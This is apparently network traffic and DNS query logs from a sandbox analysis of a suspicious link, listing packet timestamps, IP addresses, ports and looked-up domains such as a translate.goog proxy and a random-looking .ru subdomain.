                                                                                                                                                                                    Jan 26, 2024 14:42:24.813720942 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814099073 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814377069 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814413071 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814486980 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814673901 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814764977 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.814804077 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.815352917 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:24.853635073 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.854022026 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.854041100 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.854551077 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.855300903 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.855382919 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.855644941 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:24.861907005 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.861929893 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:24.901905060 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.281960964 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282000065 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282063961 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282098055 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282125950 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282150030 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282167912 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282224894 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282231092 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282258987 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282273054 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282318115 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282373905 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282378912 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282394886 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282470942 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.282581091 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.288199902 CET49833443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.288213968 CET44349833104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.288830042 CET49834443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:25.288851976 CET44349834104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.340480089 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.340513945 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.340603113 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.341732025 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.341746092 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.343060017 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.343089104 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.343149900 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.343722105 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.343749046 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.352494001 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.352596998 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.352658987 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.353503942 CET49835443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.353528976 CET44349835172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.589546919 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.589852095 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.589870930 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.590444088 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.590747118 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.590836048 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.590888977 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.593729973 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.593939066 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.593962908 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.594490051 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.594763994 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.594844103 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.594855070 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.633905888 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:25.635360956 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:25.635545015 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.073940039 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.074026108 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.074155092 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.074172020 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.074315071 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.075146914 CET49836443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.075165987 CET44349836172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.086908102 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.086977005 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087028980 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087028980 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087048054 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087090969 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087106943 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087178946 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087222099 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087228060 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087255001 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:26.087295055 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.112307072 CET49837443192.168.2.16172.67.139.144
                                                                                                                                                                                    Jan 26, 2024 14:42:26.112325907 CET44349837172.67.139.144192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.447604895 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:27.447643995 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.447705030 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:27.448333025 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:27.448345900 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.660159111 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.660769939 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:27.660785913 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.661115885 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.662009954 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:27.662072897 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:27.711273909 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:28.846684933 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:28.846723080 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:28.846829891 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:28.849663019 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:28.849678993 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.070264101 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.082104921 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.082117081 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.083292961 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.112044096 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.112200022 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.112375975 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.162271023 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303431034 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303626060 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303699970 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303734064 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303750038 CET4434984135.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303761959 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.303805113 CET49841443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.304455042 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.304507017 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.304600954 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.304826021 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.304846048 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.523083925 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.523458958 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.523484945 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.523857117 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.524144888 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.524202108 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.524315119 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.524394035 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.524415016 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.754133940 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.754350901 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:29.754440069 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.785892010 CET49842443192.168.2.1635.190.80.1
                                                                                                                                                                                    Jan 26, 2024 14:42:29.785923004 CET4434984235.190.80.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:37.673496962 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:37.673592091 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:37.673645020 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:39.433063984 CET49840443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:42:39.433095932 CET44349840142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.483681917 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.483731985 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.483877897 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.484175920 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.484188080 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.697382927 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.697716951 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.697734118 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.698266029 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.698401928 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.699342012 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.699454069 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.701153994 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.701225996 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.701344013 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.701351881 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.743329048 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.914675951 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.916747093 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.916925907 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.917366982 CET49853443192.168.2.16142.251.15.138
                                                                                                                                                                                    Jan 26, 2024 14:42:52.917376995 CET44349853142.251.15.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:04.760806084 CET49716443192.168.2.1623.220.189.216
                                                                                                                                                                                    Jan 26, 2024 14:43:04.863936901 CET4434971623.220.189.216192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:04.863953114 CET4434971623.220.189.216192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:04.864063025 CET49716443192.168.2.1623.220.189.216
                                                                                                                                                                                    Jan 26, 2024 14:43:04.864088058 CET49716443192.168.2.1623.220.189.216
                                                                                                                                                                                    Jan 26, 2024 14:43:27.463395119 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:43:27.463459015 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.463555098 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:43:27.463879108 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:43:27.463891029 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.676862001 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.677229881 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:43:27.677247047 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.677625895 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.677975893 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    Jan 26, 2024 14:43:27.678031921 CET44349870142.250.105.105192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:43:27.718327999 CET49870443192.168.2.16142.250.105.105
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 26, 2024 14:41:23.069946051 CET53509551.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.165081978 CET5463853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.165476084 CET5179453192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.166148901 CET5137053192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.166450024 CET5881353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.248224020 CET5819353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.248555899 CET5185553192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283786058 CET53546381.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.283941031 CET53517941.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284419060 CET53513701.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284950972 CET53588131.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.918247938 CET53586691.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.134855032 CET53581931.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.148315907 CET53518551.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.832470894 CET5519453192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:24.832829952 CET5846353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:24.956381083 CET53551941.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.957264900 CET53584631.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:25.754650116 CET5646753192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:25.754888058 CET6305253192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:25.885040998 CET53564671.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:25.885418892 CET53630521.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:27.345484972 CET4999553192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:27.345983982 CET5808153192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:27.391526937 CET6248953192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:27.391994953 CET6532153192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510015965 CET53624891.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:27.510759115 CET53653211.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:27.720777035 CET53499951.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:27.757230997 CET53580811.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:28.843470097 CET5058253192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:28.845113039 CET6075953192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:28.961772919 CET53505821.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:28.963368893 CET53607591.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:28.975509882 CET6427253192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:28.975714922 CET6201353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:28.976155043 CET5142353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:28.976528883 CET5840753192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094404936 CET53620131.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094424963 CET53642721.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:29.094844103 CET53514231.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:29.095380068 CET53584071.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:30.309941053 CET5442353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:30.310445070 CET5065553192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:30.428713083 CET53544231.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:30.429198027 CET53506551.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:31.826164007 CET5696553192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:31.826356888 CET5030853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:31.944544077 CET53569651.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:31.945250988 CET53503081.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:36.635503054 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                    Jan 26, 2024 14:41:39.342803001 CET5618453192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:39.344086885 CET6032853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:39.461385012 CET53561841.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:39.463254929 CET53603281.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:40.953229904 CET53652491.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.374684095 CET53616761.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:54.374093056 CET4969853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:54.374766111 CET6424853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:54.422066927 CET5502353192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:54.422458887 CET5142853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:54.542210102 CET53514281.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:54.544529915 CET53550231.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:55.551898003 CET6150853192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:55.554053068 CET6481953192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:41:59.971635103 CET53650761.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.532738924 CET53537121.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:22.724178076 CET53616861.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:51.012717009 CET53617711.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.363157034 CET6514053192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:42:52.363822937 CET6058153192.168.2.161.1.1.1
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482110977 CET53651401.1.1.1192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:52.482806921 CET53605811.1.1.1192.168.2.16
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 26, 2024 14:41:23.165081978 CET192.168.2.161.1.1.10xea7fStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.165476084 CET192.168.2.161.1.1.10x34a7Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.166148901 CET192.168.2.161.1.1.10x1da3Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.166450024 CET192.168.2.161.1.1.10xd565Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.248224020 CET192.168.2.161.1.1.10x7188Standard query (0)kibt.edu.lkA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:23.248555899 CET192.168.2.161.1.1.10x74d4Standard query (0)kibt.edu.lk65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:24.832470894 CET192.168.2.161.1.1.10x6Standard query (0)cascade-madmimi-com.translate.googA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:24.832829952 CET192.168.2.161.1.1.10x5f53Standard query (0)cascade-madmimi-com.translate.goog65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:25.754650116 CET192.168.2.161.1.1.10xece7Standard query (0)cascade-madmimi-com.translate.googA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:25.754888058 CET192.168.2.161.1.1.10x2109Standard query (0)cascade-madmimi-com.translate.goog65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.345484972 CET192.168.2.161.1.1.10xb293Standard query (0)bggcwvekn3axi3ffz5ai.rvucouijw.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.345983982 CET192.168.2.161.1.1.10x5484Standard query (0)bggcwvekn3axi3ffz5ai.rvucouijw.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.391526937 CET192.168.2.161.1.1.10xb731Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:27.391994953 CET192.168.2.161.1.1.10x402fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.843470097 CET192.168.2.161.1.1.10x7807Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.845113039 CET192.168.2.161.1.1.10x8996Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 26, 2024 14:41:28.975509882 CET192.168.2.161.1.1.10x306aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
